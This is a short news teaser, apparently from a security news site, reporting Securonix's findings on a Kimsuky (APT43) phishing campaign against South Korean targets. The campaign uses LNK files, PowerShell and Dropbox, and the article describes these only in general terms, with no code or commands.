A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima. "Leveraging tailored phishing lures written in Korean and disguised as legitimate documents, the attackers successfully infiltrated targeted environments," security researchers Den Iuzvyk and Tim Peck said in a report shared with The Hacker News, describing the activity as a "sophisticated and multi-stage operation." The decoy documents, sent via phishing emails as .HWP, .XLSX, and .PPTX files, are disguised as work logs, insurance documents and crypto-related files to trick recipients into opening them, thereby triggering the infection process. The attack chain is notable for its heavy reliance on PowerShell scripts at various stages, including payload delivery, reconnaissance, and execution. It's also characterized by the use of Dropbox for payload distribution and data exfiltration. It all starts with a ZIP archive containing a single Windows shortcut (.LNK) file that masquerades as a legitimate document, which, when extracted and launched, triggers the execution of PowerShell code to retrieve and display a lure document hosted on Dropbox, while stealthily establishing…Read More
North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
